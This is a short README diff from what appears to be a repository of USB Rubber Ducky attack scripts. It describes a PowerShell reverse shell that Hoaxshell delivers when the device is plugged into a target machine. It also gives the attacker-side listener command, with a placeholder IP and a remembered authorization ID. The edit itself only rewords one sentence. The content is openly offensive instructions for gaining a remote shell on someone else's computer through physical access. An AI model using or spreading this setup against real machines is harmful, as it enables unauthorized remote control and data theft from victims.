k7tz/usbrubberducky-scripts/README.md

 Hoaxshell with usb RubberDucky:
 -------------------------------------------

-Powershell reverse shell with Authorization ID using Hoaxshell,after we insert the USB RubberDucky wait a few seconds for the payload to load and when its done the Capslook turns ON/OFF on target
+Powershell reverse shell with Authorization ID using Hoaxshell,after inserting the USB RubberDucky wait a few seconds for the payload to load and execute, once its done the Capslook will turn ON/OFF on target

 on the attacker machine use the -g to remember the Authorization id ./hoaxshell.py -s X.X.X.X -r -g -H "Authorization"